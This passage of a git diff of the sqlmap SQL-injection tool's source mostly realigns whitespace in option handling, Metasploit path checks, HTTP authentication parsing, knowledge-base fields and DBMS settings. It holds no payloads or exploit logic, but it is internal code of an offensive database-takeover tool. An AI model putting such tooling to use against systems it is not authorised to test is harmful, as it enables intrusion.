__setMetasploit(): condition = False for path in [conf.msfPath, os.path.join(conf.msfPath, 'bin')]: - condition = os.path.exists(normalizePath(path)) + condition = os.path.exists(normalizePath(path)) condition &= os.path.exists(normalizePath(os.path.join(path, "msfcli"))) condition &= os.path.exists(normalizePath(os.path.join(path, "msfconsole"))) condition &= os.path.exists(normalizePath(os.path.join(path, "msfencode"))) @@ -524,13 +524,13 @@ def __setMetasploit(): break if condition: - debugMsg = "provided Metasploit Framework 3 path " + debugMsg = "provided Metasploit Framework 3 path " debugMsg += "'%s' is valid" % conf.msfPath logger.debug(debugMsg) msfEnvPathExists = True else: - warnMsg = "the provided Metasploit Framework 3 path " + warnMsg = "the provided Metasploit Framework 3 path " warnMsg += "'%s' is not valid. The cause could " % conf.msfPath warnMsg += "be that the path does not exists or that one " warnMsg += "or more of the needed Metasploit executables " @@ -538,12 +538,12 @@ def __setMetasploit(): warnMsg += "msfpayload do not exist" logger.warn(warnMsg) else: - warnMsg = "you did not provide the local path where Metasploit " + warnMsg = "you did not provide the local path where Metasploit " warnMsg += "Framework 3 is installed" logger.warn(warnMsg) if not msfEnvPathExists: - warnMsg = "sqlmap is going to look for Metasploit Framework 3 " + warnMsg = "sqlmap is going to look for Metasploit Framework 3 " warnMsg += "installation into the environment paths" logger.warn(warnMsg) @@ -555,25 +555,25 @@ def __setMetasploit(): envPaths = envPaths.split(":") for envPath in envPaths: - envPath = envPath.replace(";", "") - condition = os.path.exists(normalizePath(envPath)) + envPath = envPath.replace(";", "") + condition = os.path.exists(normalizePath(envPath)) condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfcli"))) condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfconsole"))) condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfencode"))) condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfpayload"))) if condition: - infoMsg = "Metasploit Framework 3 has been found " + infoMsg = "Metasploit Framework 3 has been found " infoMsg += "installed in the '%s' path" % envPath logger.info(infoMsg) msfEnvPathExists = True - conf.msfPath = envPath + conf.msfPath = envPath break if not msfEnvPathExists: - errMsg = "unable to locate Metasploit Framework 3 installation. " + errMsg = "unable to locate Metasploit Framework 3 installation. " errMsg += "Get it from http://metasploit.com/framework/download/" raise sqlmapFilePathException, errMsg @@ -589,7 +589,7 @@ def __setWriteFile(): raise sqlmapFilePathException, errMsg if not conf.dFile: - errMsg = "you did not provide the back-end DBMS absolute path " + errMsg = "you did not provide the back-end DBMS absolute path " errMsg += "where you want to write the local file '%s'" % conf.wFile raise sqlmapMissingMandatoryOptionException, errMsg @@ -714,11 +714,11 @@ def __setTamperingFunctions(): dirname, filename = os.path.split(tfile) dirname = os.path.abspath(dirname) - infoMsg = "loading tamper script '%s'" % filename[:-3] + infoMsg = "loading tamper script '%s'" % filename[:-3] logger.info(infoMsg) if not os.path.exists(os.path.join(dirname, '__init__.py')): - errMsg = "make sure that there is an empty file '__init__.py' " + errMsg = "make sure that there is an empty file '__init__.py' " errMsg += "inside of tamper scripts directory '%s'" % dirname raise sqlmapGenericException, errMsg @@ -738,7 +738,7 @@ def __setTamperingFunctions(): kb.tamperFunctions.append(function) if check_priority and priority > last_priority: - message = "it seems that you might have mixed " + message = "it seems that you might have mixed " message += "the order of tamper scripts.\n" message += "Do you want to auto resolve this? [Y/n/q]" test = readInput(message, default="Y") @@ -803,13 +803,13 @@ def __setHTTPProxy(): debugMsg = "setting the HTTP proxy to pass by all HTTP requests" logger.debug(debugMsg) - __proxySplit = urlparse.urlsplit(conf.proxy) + __proxySplit = urlparse.urlsplit(conf.proxy) __hostnamePort = __proxySplit[1].split(":") - __scheme = __proxySplit[0] - __hostname = __hostnamePort[0] - __port = None - __proxyString = "" + __scheme = __proxySplit[0] + __hostname = __hostnamePort[0] + __port = None + __proxyString = "" if len(__hostnamePort) == 2: try: @@ -825,7 +825,7 @@ def __setHTTPProxy(): pCredRegExp = re.search("^(.*?):(.*?)$", conf.pCred) if not pCredRegExp: - errMsg = "Proxy authentication credentials " + errMsg = "Proxy authentication credentials " errMsg += "value must be in format username:password" raise sqlmapSyntaxException, errMsg @@ -911,12 +911,12 @@ def __setHTTPAuthentication(): return elif conf.aType and not conf.aCred: - errMsg = "you specified the HTTP authentication type, but " + errMsg = "you specified the HTTP authentication type, but " errMsg += "did not provide the credentials" raise sqlmapSyntaxException, errMsg elif not conf.aType and conf.aCred: - errMsg = "you specified the HTTP authentication credentials, " + errMsg = "you specified the HTTP authentication credentials, " errMsg += "but did not provide the type" raise sqlmapSyntaxException, errMsg @@ -927,16 +927,16 @@ def __setHTTPAuthentication(): aTypeLower = conf.aType.lower() if aTypeLower not in ( "basic", "digest", "ntlm" ): - errMsg = "HTTP authentication type value must be " + errMsg = "HTTP authentication type value must be " errMsg += "Basic, Digest or NTLM" raise sqlmapSyntaxException, errMsg elif aTypeLower in ( "basic", "digest" ): regExp = "^(.*?):(.*?)$" - errMsg = "HTTP %s authentication credentials " % aTypeLower + errMsg = "HTTP %s authentication credentials " % aTypeLower errMsg += "value must be in format username:password" elif aTypeLower == "ntlm": regExp = "^(.*?)\\\(.*?):(.*?)$" - errMsg = "HTTP NTLM authentication credentials value must " + errMsg = "HTTP NTLM authentication credentials value must " errMsg += "be in format DOMAIN\username:password" aCredRegExp = re.search(regExp, conf.aCred) @@ -960,7 +960,7 @@ def __setHTTPAuthentication(): try: from ntlm import HTTPNtlmAuthHandler except ImportError, _: - errMsg = "sqlmap requires Python NTLM third-party library " + errMsg = "sqlmap requires Python NTLM third-party library " errMsg += "in order to authenticate via NTLM, " errMsg += "http://code.google.com/p/python-ntlm/" raise sqlmapMissingDependence, errMsg @@ -973,7 +973,7 @@ def __setHTTPAuthentication(): aCertRegExp = re.search("^(.+?),\s*(.+?)$", conf.aCert) if not aCertRegExp: - errMsg = "HTTP authentication certificate option " + errMsg = "HTTP authentication certificate option " errMsg += "must be in format key_file,cert_file" raise sqlmapSyntaxException, errMsg @@ -983,7 +983,7 @@ def __setHTTPAuthentication(): for ifile in (key_file, cert_file): if not os.path.exists(ifile): - errMsg = "File '%s' does not exist" % ifile + errMsg = "File '%s' does not exist" % ifile raise sqlmapSyntaxException, errMsg authHandler = HTTPSCertAuthHandler(key_file, cert_file) @@ -1091,14 +1091,14 @@ def __setHTTPUserAgent(): else: if not kb.userAgents: - debugMsg = "loading random HTTP User-Agent header(s) from " + debugMsg = "loading random HTTP User-Agent header(s) from " debugMsg += "file '%s'" % paths.USER_AGENTS logger.debug(debugMsg) try: kb.userAgents = getFileItems(paths.USER_AGENTS) except IOError: - warnMsg = "unable to read HTTP User-Agent header " + warnMsg = "unable to read HTTP User-Agent header " warnMsg += "file '%s'" % paths.USER_AGENTS logger.warn(warnMsg) @@ -1115,7 +1115,7 @@ def __setHTTPUserAgent(): userAgent = sanitizeStr(userAgent) conf.httpHeaders.append((HTTPHEADER.USER_AGENT, userAgent)) - logMsg = "fetched random HTTP User-Agent header from " + logMsg = "fetched random HTTP User-Agent header from " logMsg += "file '%s': %s" % (paths.USER_AGENTS, userAgent) logger.info(logMsg) @@ -1154,7 +1154,7 @@ def __setHTTPTimeout(): conf.timeout = float(conf.timeout) if conf.timeout < 3.0: - warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap " + warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap " warnMsg += "will going to reset it" logger.warn(warnMsg) @@ -1234,7 +1234,7 @@ def __cleanupOptions(): conf.timeSec = 2 * TIME_DEFAULT_DELAY kb.adjustTimeDelay = False - warnMsg = "increasing default value for " + warnMsg = "increasing default value for " warnMsg += "--time-sec to %d because " % conf.timeSec warnMsg += "--tor switch was provided" logger.warn(warnMsg) @@ -1253,27 +1253,27 @@ def __setConfAttributes(): debugMsg = "initializing the configuration" logger.debug(debugMsg) - conf.boundaries = [] - conf.cj = None - conf.dbmsConnector = None - conf.dbmsHandler = None - conf.dumpPath = None - conf.httpHeaders = [] - conf.hostname = None - conf.loggedToOut = None - conf.multipleTargets = False - conf.outputPath = None - conf.paramDict = {} - conf.parameters = {} - conf.path = None - conf.port = None - conf.redirectHandled = False - conf.scheme = None - conf.sessionFP = None - conf.start = True - conf.tests = [] - conf.trafficFP = None - conf.wFileType = None + conf.boundaries = [] + conf.cj = None + conf.dbmsConnector = None + conf.dbmsHandler = None + conf.dumpPath = None + conf.httpHeaders = [] + conf.hostname = None + conf.loggedToOut = None + conf.multipleTargets = False + conf.outputPath = None + conf.paramDict = {} + conf.parameters = {} + conf.path = None + conf.port = None + conf.redirectHandled = False + conf.scheme = None + conf.sessionFP = None + conf.start = True + conf.tests = [] + conf.trafficFP = None + conf.wFileType = None def __setKnowledgeBaseAttributes(flushAll=True): """ @@ -1284,95 +1284,95 @@ def __setKnowledgeBaseAttributes(flushAll=True): debugMsg = "initializing the knowledge base" logger.debug(debugMsg) - kb.absFilePaths = set() - kb.adjustTimeDelay = False - kb.arch = None - kb.authHeader = None - kb.bannerFp = advancedDict() + kb.absFilePaths = set() + kb.adjustTimeDelay = False + kb.arch = None + kb.authHeader = None + kb.bannerFp = advancedDict() - kb.brute = advancedDict({'tables':[], 'columns':[]}) - kb.bruteMode = False + kb.brute = advancedDict({'tables':[], 'columns':[]}) + kb.bruteMode = False - kb.cache = advancedDict() - kb.cache.content = {} - kb.cache.regex = {} - kb.cache.stdev = {} + kb.cache = advancedDict() + kb.cache.content = {} + kb.cache.regex = {} + kb.cache.stdev = {} - kb.commonOutputs = None + kb.commonOutputs = None - kb.data = advancedDict() + kb.data = advancedDict() # Active back-end DBMS fingerprint - kb.dbms = None - kb.dbmsVersion = [ UNKNOWN_DBMS_VERSION ] + kb.dbms = None + kb.dbmsVersion = [ UNKNOWN_DBMS_VERSION ] - kb.delayCandidates = TIME_DELAY_CANDIDATES * [0] - kb.dep = None - kb.docRoot = None - kb.dynamicMarkings = [] - kb.endDetection = False - kb.httpErrorCodes = {} - kb.errorIsNone = True - kb.formNames = [] - kb.headersCount = 0 - kb.headersFp = {} - kb.hintValue = None - kb.htmlFp = [] - kb.injection = injectionDict() - kb.injections = [] + kb.delayCandidates = TIME_DELAY_CANDIDATES * [0] + kb.dep = None + kb.docRoot = None + kb.dynamicMarkings = [] + kb.endDetection = False + kb.httpErrorCodes = {} + kb.errorIsNone = True + kb.formNames = [] + kb.headersCount = 0 + kb.headersFp = {} + kb.hintValue = None + kb.htmlFp = [] + kb.injection = injectionDict() + kb.injections = [] - kb.locks = advancedDict() - kb.locks.cacheLock = threading.Lock() - kb.locks.logLock = threading.Lock() + kb.locks = advancedDict() + kb.locks.cacheLock = threading.Lock() + kb.locks.logLock = threading.Lock() - kb.matchRatio = None - kb.nullConnection = None - kb.pageTemplate = None - kb.pageTemplates = dict() - kb.originalPage = None + kb.matchRatio = None + kb.nullConnection = None + kb.pageTemplate = None + kb.pageTemplates = dict() + kb.originalPage = None # Back-end DBMS underlying operating system fingerprint via banner (-b) # parsing - kb.os = None - kb.osVersion = None - kb.osSP = None + kb.os = None + kb.osVersion = None + kb.osSP = None - kb.pageEncoding = DEFAULT_PAGE_ENCODING - kb.pageStable = None - kb.partRun = None - kb.proxyAuthHeader = None - kb.queryCounter = 0 - kb.redirectSetCookie = None - kb.responseTimes = [] - kb.resumedQueries = {} - kb.retriesCount = 0 - kb.singleLogFlags = set() - kb.skipOthersDbms = None - kb.suppressSession = False - kb.suppressResumeInfo = False - kb.technique = None - kb.testMode = False - kb.testQueryCount = 0 - kb.threadContinue = True - kb.threadException = False - kb.threadData = {} + kb.pageEncoding = DEFAULT_PAGE_ENCODING + kb.pageStable = None + kb.partRun = None + kb.proxyAuthHeader = None + kb.queryCounter = 0 + kb.redirectSetCookie = None + kb.responseTimes = [] + kb.resumedQueries = {} + kb.retriesCount = 0 + kb.singleLogFlags = set() + kb.skipOthersDbms = None + kb.suppressSession = False + kb.suppressResumeInfo = False + kb.technique = None + kb.testMode = False + kb.testQueryCount = 0 + kb.threadContinue = True + kb.threadException = False + kb.threadData = {} kb.xpCmdshellAvailable = False - kb.misc = advancedDict() - kb.misc.delimiter = randomStr(length=6, lowercase=True) - kb.misc.start = ":%s:" % randomStr(length=3, lowercase=True) - kb.misc.stop = ":%s:" % randomStr(length=3, lowercase=True) - kb.misc.space = ":%s:" % randomStr(length=1, lowercase=True) - kb.misc.dollar = ":%s:" % randomStr(length=1, lowercase=True) + kb.misc = advancedDict() + kb.misc.delimiter = randomStr(length=6, lowercase=True) + kb.misc.start = ":%s:" % randomStr(length=3, lowercase=True) + kb.misc.stop = ":%s:" % randomStr(length=3, lowercase=True) + kb.misc.space = ":%s:" % randomStr(length=1, lowercase=True) + kb.misc.dollar = ":%s:" % randomStr(length=1, lowercase=True) kb.misc.forcedDbms = None if flushAll: - kb.keywords = set(getFileItems(paths.SQL_KEYWORDS)) + kb.keywords = set(getFileItems(paths.SQL_KEYWORDS)) kb.tamperFunctions = [] - kb.targetUrls = set() - kb.testedParams = set() - kb.userAgents = None - kb.wordlist = None + kb.targetUrls = set() + kb.testedParams = set() + kb.userAgents = None + kb.wordlist = None def __useWizardInterface(): """ diff --git a/lib/core/profiling.py b/lib/core/profiling.py index 76812a407..ef92e46f1 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -49,7 +49,7 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): if os.path.exists(imageOutputFile): os.remove(imageOutputFile) - infoMsg = "profiling the execution into file %s" % profileOutputFile + infoMsg = "profiling the execution into file %s" % profileOutputFile logger.info(infoMsg) # Start sqlmap main function and generate a raw profile file diff --git a/lib/core/replication.py b/lib/core/replication.py index 346038c14..527284c59 100644 --- a/lib/core/replication.py +++ b/lib/core/replication.py @@ -107,8 +107,8 @@ class Replication: self.connection.close() # sqlite data types - NULL = DataType('NULL') + NULL = DataType('NULL') INTEGER = DataType('INTEGER') - REAL = DataType('REAL') - TEXT = DataType('TEXT') - BLOB = DataType('BLOB') + REAL = DataType('REAL') + TEXT = DataType('TEXT') + BLOB = DataType('BLOB') diff --git a/lib/core/session.py b/lib/core/session.py index 96cf67444..38d5963bd 100644 --- a/lib/core/session.py +++ b/lib/core/session.py @@ -113,7 +113,7 @@ def setOs(): } """ - infoMsg = "" + infoMsg = "" condition = ( not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and @@ -191,8 +191,8 @@ def resumeConfKb(expression, url, value): logger.info(logMsg) elif expression == "DBMS" and url == conf.url: - dbms = unSafeFormatString(value[:-1]) - dbms = dbms.lower() + dbms = unSafeFormatString(value[:-1]) + dbms = dbms.lower() dbmsVersion = [UNKNOWN_DBMS_VERSION] logMsg = "resuming back-end DBMS '%s' " % dbms @@ -203,11 +203,11 @@ def resumeConfKb(expression, url, value): dbmsRegExp = re.search("%s ([\d\.]+)" % firstRegExp, dbms) if dbmsRegExp: - dbms = dbmsRegExp.group(1) + dbms = dbmsRegExp.group(1) dbmsVersion = [ dbmsRegExp.group(2) ] if conf.dbms and conf.dbms.lower() != dbms: - message = "you provided '%s' as back-end DBMS, " % conf.dbms + message = "you provided '%s' as back-end DBMS, " % conf.dbms message += "but from a past scan information on the target URL " message += "sqlmap assumes the back-end DBMS is %s. " % dbms message += "Do you really want to force the back-end " @@ -230,7 +230,7 @@ def resumeConfKb(expression, url, value): logger.info(logMsg) if conf.os and conf.os.lower() != os.lower(): - message = "you provided '%s' as back-end DBMS operating " % conf.os + message = "you provided '%s' as back-end DBMS operating " % conf.os message += "system, but from a past scan information on the " message += "target URL sqlmap assumes the back-end DBMS " message += "operating system is %s. " % os diff --git a/lib/core/settings.py b/lib/core/settings.py index 721de8619..45dd13498 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -17,16 +17,16 @@ from lib.core.enums import PLACE from lib.core.revision import getRevisionNumber # sqlmap version and site -VERSION = "1.0-dev" -REVISION = getRevisionNumber() -VERSION_STRING = "sqlmap/%s (r%s)" % (VERSION, REVISION) -DESCRIPTION = "automatic SQL injection and database takeover tool" -SITE = "http://sqlmap.sourceforge.net" -ML = "sqlmap-users@lists.sourceforge.net" +VERSION = "1.0-dev" +REVISION = getRevisionNumber() +VERSION_STRING = "sqlmap/%s (r%s)" % (VERSION, REVISION) +DESCRIPTION = "automatic SQL injection and database takeover tool" +SITE = "http://sqlmap.sourceforge.net" +ML = "sqlmap-users@lists.sourceforge.net" # minimum distance of ratio from kb.matchRatio to result in True -DIFF_TOLERANCE = 0.05 -CONSTANT_RATIO = 0.9 +DIFF_TOLERANCE = 0.05 +CONSTANT_RATIO = 0.9 # lower and upper values for match ratio in case of stable page LOWER_RATIO_BOUND = 0.02 @@ -37,9 +37,9 @@ logging.addLevelName(9, "PAYLOAD") logging.addLevelName(8, "TRAFFIC OUT") logging.addLevelName(7, "TRAFFIC IN") -LOGGER = logging.getLogger("sqlmapLog") -LOGGER_HANDLER = logging.StreamHandler(sys.stdout) -FORMATTER = logging.Formatter("[%(asctime)s] [%(levelname)s] %(message)s", "%H:%M:%S") +LOGGER = logging.getLogger("sqlmapLog") +LOGGER_HANDLER = logging.StreamHandler(sys.stdout) +FORMATTER = logging.Formatter("[%(asctime)s] [%(levelname)s] %(message)s", "%H:%M:%S") LOGGER_HANDLER.setFormatter(FORMATTER) LOGGER.addHandler(LOGGER_HANDLER) @@ -47,21 +47,21 @@ LOGGER.setLevel(logging.WARN) # dump markers DUMP_NEWLINE_MARKER = "__NEWLINE__" -DUMP_CR_MARKER = "__CARRIAGE_RETURN__" -DUMP_DEL_MARKER = "__DEL__" -DUMP_TAB_MARKER = "__TAB__" -DUMP_START_MARKER = "__START__" -DUMP_STOP_MARKER = "__STOP__" +DUMP_CR_MARKER = "__CARRIAGE_RETURN__" +DUMP_DEL_MARKER = "__DEL__" +DUMP_TAB_MARKER = "__TAB__" +DUMP_START_MARKER = "__START__" +DUMP_STOP_MARKER = "__STOP__" URI_QUESTION_MARKER = "__QUESTION_MARK__" -PAYLOAD_DELIMITER = "\x00" +PAYLOAD_DELIMITER = "\x00" CHAR_INFERENCE_MARK = "%c" PRINTABLE_CHAR_REGEX = r'[^\x00-\x1f\x7e-\xff]' # dumping characters used in GROUP_CONCAT MySQL technique -CONCAT_ROW_DELIMITER = ',' -CONCAT_VALUE_DELIMITER = '|' +CONCAT_ROW_DELIMITER = ',' +CONCAT_VALUE_DELIMITER = '|' # coefficient used for a time-based query delay checking (must be >= 7) TIME_STDEV_COEFF = 10 @@ -124,20 +124,20 @@ DUMMY_USER_PREFIX = "__dummy__" DEFAULT_PAGE_ENCODING = "iso-8859-1" # System variables -IS_WIN = subprocess.mswindows +IS_WIN = subprocess.mswindows # The name of the operating system dependent module imported. The following # names have currently been registered: 'posix', 'nt', 'mac', 'os2', 'ce', # 'java', 'riscos' -PLATFORM = os.name -PYVERSION = sys.version.split()[0] +PLATFORM = os.name +PYVERSION = sys.version.split()[0] # Database management system specific variables -MSSQL_SYSTEM_DBS = ( "Northwind", "model", "msdb", "pubs", "tempdb" ) -MYSQL_SYSTEM_DBS = ( "information_schema", "mysql" ) # Before MySQL 5.0 only "mysql" -PGSQL_SYSTEM_DBS = ( "information_schema", "pg_catalog", "pg_toast" ) -ORACLE_SYSTEM_DBS = ( "SYSTEM", "SYSAUX" ) # These are TABLESPACE_NAME -SQLITE_SYSTEM_DBS = ( "sqlite_master", "sqlite_temp_master" ) -ACCESS_SYSTEM_DBS = ( "MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage",\ +MSSQL_SYSTEM_DBS = ( "Northwind", "model", "msdb", "pubs", "tempdb" ) +MYSQL_SYSTEM_DBS = ( "information_schema", "mysql" ) # Before MySQL 5.0 only "mysql" +PGSQL_SYSTEM_DBS = ( "information_schema", "pg_catalog", "pg_toast" ) +ORACLE_SYSTEM_DBS = ( "SYSTEM", "SYSAUX" ) # These are TABLESPACE_NAME +SQLITE_SYSTEM_DBS = ( "sqlite_master", "sqlite_temp_master" ) +ACCESS_SYSTEM_DBS = ( "MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage",\ "MSysAccessXML", "MSysModules", "MSysModules2" ) FIREBIRD_SYSTEM_DBS = ( "RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE",\ "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS",\ @@ -145,21 +145,21 @@ FIREBIRD_SYSTEM_DBS = ( "RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_C "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS",\ "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS",\ "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS" ) -MAXDB_SYSTEM_DBS = ( "SYSINFO", "DOMAIN" ) -SYBASE_SYSTEM_DBS = ( "master", "model", "sybsystemdb", "sybsystemprocs" ) +MAXDB_SYSTEM_DBS = ( "SYSINFO", "DOMAIN" ) +SYBASE_SYSTEM_DBS = ( "master", "model", "sybsystemdb", "sybsystemprocs" ) -MSSQL_ALIASES = [ "microsoft sql server", "mssqlserver", "mssql", "ms" ] -MYSQL_ALIASES = [ "mysql", "my" ] -PGSQL_ALIASES = [ "postgresql", "postgres", "pgsql", "psql", "pg" ] -ORACLE_ALIASES = [ "oracle", "orcl", "ora", "or" ] -SQLITE_ALIASES = [ "sqlite", "sqlite3" ] -ACCESS_ALIASES = [ "access", "jet", "microsoft access", "msaccess" ] -FIREBIRD_ALIASES = [ "firebird", "mozilla firebird", "interbase", "ibase", "fb" ] -MAXDB_ALIASES = [ "maxdb", "sap maxdb", "sap db" ] -SYBASE_ALIASES = [ "sybase", "sybase sql server" ] +MSSQL_ALIASES = [ "microsoft sql server", "mssqlserver", "mssql", "ms" ] +MYSQL_ALIASES = [ "mysql", "my" ] +PGSQL_ALIASES = [ "postgresql", "postgres", "pgsql", "psql", "pg" ] +ORACLE_ALIASES = [ "oracle", "orcl", "ora", "or" ] +SQLITE_ALIASES = [ "sqlite", "sqlite3" ] +ACCESS_ALIASES = [ "access", "jet", "microsoft access", "msaccess" ] +FIREBIRD_ALIASES = [ "firebird", "mozilla firebird", "interbase", "ibase", "fb" ] +MAXDB_ALIASES = [ "maxdb", "sap maxdb", "sap db" ] +SYBASE_ALIASES = [ "sybase", "sybase sql server" ] -SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES -SUPPORTED_OS = ( "linux", "windows" ) +SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES +SUPPORTED_OS = ( "linux", "windows" ) DBMS_DICT = { DBMS.MSSQL: [MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/"], DBMS.MYSQL: [MYSQL_ALIASES, "python-mysqldb", "http://mysql-python.sourceforge.net/"], @@ -172,17 +172,17 @@ DBMS_DICT = { DBMS.MSSQL: [MSSQL_ALIASES, "python-pymssql", "http://pymssql.sour DBMS.SYBASE: [SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/"] } -REFERER_ALIASES = ( "ref", "referer", "referrer" ) -USER_AGENT_ALIASES = ( "ua", "useragent", "user-agent" ) +REFERER_ALIASES = ( "ref", "referer", "referrer" ) +USER_AGENT_ALIASES = ( "ua", "useragent", "user-agent" ) -FROM_TABLE = { +FROM_TABLE = { DBMS.ORACLE: " FROM DUAL", DBMS.ACCESS: " FROM MSysObjects", DBMS.FIREBIRD: " FROM RDB$DATABASE", DBMS.MAXDB: " FROM VERSIONS" } -SQL_STATEMENTS = { +SQL_STATEMENTS = { "SQL SELECT statement": ( "select ", "show ", @@ -236,10 +236,10 @@ ERROR_PARSING_REGEXES = ( ) # Regular expression used for parsing charset info from meta html headers -META_CHARSET_REGEX = r']+charset=(?P[^">]+)' +META_CHARSET_REGEX = r']+charset=(?P[^">]+)' # Regular expression used for parsing refresh info from meta html headers -META_REFRESH_REGEX = r']+content="?[^">]+url=(?P[^">]+)' +META_REFRESH_REGEX = r']+content="?[^">]+url=(?P[^">]+)' # Regular expression used for parsing empty fields in tested form data EMPTY_FORM_FIELDS_REGEX = r'(?P[^=]+=(&|\Z))' diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py index 78dfbd04a..02bde695c 100644 --- a/lib/core/subprocessng.py +++ b/lib/core/subprocessng.py @@ -51,7 +51,7 @@ def blockingWriteToFD(fd, data): while True: try: data_length = len(data) - wrote_data = os.write(fd, data) + wrote_data = os.write(fd, data) except (OSError, IOError), io: if io.errno in (errno.EAGAIN, errno.EINTR): continue diff --git a/lib/core/target.py b/lib/core/target.py index bdaf1e789..8e7b5ceef 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -140,12 +140,12 @@ def __setRequestParams(): __testableParameters = True if not conf.parameters: - errMsg = "you did not provide any GET, POST and Cookie " + errMsg = "you did not provide any GET, POST and Cookie " errMsg += "parameter, neither an User-Agent or Referer header" raise sqlmapGenericException, errMsg elif not __testableParameters: - errMsg = "all testable parameters you provided are not present " + errMsg = "all testable parameters you provided are not present " errMsg += "within the GET, POST and Cookie parameters" raise sqlmapGenericException, errMsg @@ -308,9 +308,9 @@ def initTargetEnv(): if conf.cj: conf.cj.clear() - conf.paramDict = {} - conf.parameters = {} - conf.sessionFile = None + conf.paramDict = {} + conf.parameters = {} + conf.sessionFile = None __setKnowledgeBaseAttributes(False) __restoreCmdLineOptions() diff --git a/lib/core/testing.py b/lib/core/testing.py index 6c10b9eca..46f995c82 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -164,8 +164,8 @@ def liveTest(): def initCase(switches=None): paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp() - paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") - paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") + paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") + paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") cmdLineOptions = cmdLineParser() cmdLineOptions.liveTest = cmdLineOptions.smokeTest = False @@ -181,8 +181,8 @@ def initCase(switches=None): def cleanCase(): shutil.rmtree(paths.SQLMAP_OUTPUT_PATH, True) paths.SQLMAP_OUTPUT_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "output") - paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") - paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") + paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") + paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") conf.verbose = 1 __setVerbosity() diff --git a/lib/core/threads.py b/lib/core/threads.py index dff2b3de9..a172e54d6 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -18,14 +18,14 @@ class ThreadData(): """ def __init__(self): - self.disableStdOut = False - self.lastErrorPage = None - self.lastHTTPError = None - self.lastRedirectMsg = None - self.lastQueryDuration = 0 - self.lastRequestUID = 0 - self.seqMatcher = difflib.SequenceMatcher(None) - self.valueStack = [] + self.disableStdOut = False + self.lastErrorPage = None + self.lastHTTPError = None + self.lastRedirectMsg = None + self.lastQueryDuration = 0 + self.lastRequestUID = 0 + self.seqMatcher = difflib.SequenceMatcher(None) + self.valueStack = [] def getCurrentThreadUID(): return hash(threading.currentThread()) diff --git a/lib/core/xmldump.py b/lib/core/xmldump.py index 277a63c1a..f0b2c1b30 100644 --- a/lib/core/xmldump.py +++ b/lib/core/xmldump.py @@ -73,7 +73,7 @@ XMLNS_ATTR = "xmlns:xsi" SCHEME_NAME = "sqlmap.xsd" SCHEME_NAME_ATTR = "xsi:noNamespaceSchemaLocation" CHARACTERS_TO_ENCODE = range(32) + range(127, 256) -ENTITIES = {'"':'"',"'":"'"} +ENTITIES = {'"':'"',"'":"'"} class XMLDump: ''' @@ -83,7 +83,7 @@ class XMLDump: def __init__(self): self.__outputFile = None - self.__outputFP = None + self.__outputFP = None self.__root = None self.__doc = Document() @@ -384,7 +384,7 @@ class XMLDump: db = "All" table = tableValues["__infos__"]["table"] - count = int(tableValues["__infos__"]["count"]) + count = int(tableValues["__infos__"]["count"]) columns = tableValues.keys() columns.sort(key=lambda x: x.lower()) diff --git a/lib/parse/banner.py b/lib/parse/banner.py index 97db72351..3d3b5e55c 100644 --- a/lib/parse/banner.py +++ b/lib/parse/banner.py @@ -30,14 +30,14 @@ class MSSQLBannerHandler(ContentHandler): def __init__(self, banner, info): ContentHandler.__init__(self) - self.__banner = sanitizeStr(banner) - self.__inVersion = False + self.__banner = sanitizeStr(banner) + self.__inVersion = False self.__inServicePack = False - self.__release = None - self.__version = "" - 